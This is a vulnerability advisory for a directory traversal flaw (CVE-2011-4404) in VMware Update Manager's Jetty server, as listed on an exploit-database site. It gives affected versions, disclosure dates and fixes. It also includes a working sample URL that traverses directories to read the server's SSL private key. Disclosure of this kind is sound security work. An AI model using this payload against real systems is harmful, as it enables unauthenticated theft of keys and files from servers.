[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

VMware Update Manager Directory Traversal

Author
Alexey Sintsov
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16861
Category
remote exploits
Date add
20-11-2011
Platform
windows
# Exploit Title:VMware Update Manager Directory Traversal
# Date:18/11/2011
# Author: Alexey Sintsov
# Software Link: http://www.vmware.com/
# Version:2.0.2
# Tested on: Windows 2003 / vCenter Update Manager 4.1 U1
# CVE : CVE-2011-4404
 
DSECRG-11-042 VMware Update Manager - Directory Traversal
 
 
Application: VMware Update Manager
Versions Affected: vCenter Update Manager 4.1 prior to Update 2, vCenter Update Manager 4.0 prior to Update 4
Vendor URL: http://vmware.com
Bugs: Directory Traversal File Read
CVE: CVE-2011-4404
CVSS2: 7.8
Exploits: YES
Reported: 06.06.2010
Vendor response: 06.06.2010
Date of Public Advisory: 18.11.2011
Authors: Alexey Sintsov
Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
 
Description
********
Directory Traversal vulnerability was found in Jetty web server that is used by VMware Update manager.
 
Details
*******
Directory Traversal vulnerability was found in Jetty web server that is used by VUM.
With this vulnerability, an non-authenticated attacker can read any file on the server (with rights of the process).
 
Sample
******
http://<target>:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
 
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=342
http://www.vmware.com/security/advisories/VMSA-2011-0014.html
 
 
Fix Information
*************
 
Vendor make fix for this issue:
Fixed in Update Manager 5.0 Windows not affected
Fixed in Update Manager 4.1 Windows Update 2
Fixed in Update Manager 4.0 Windows Update 4



#  0day.today [2024-12-24]  #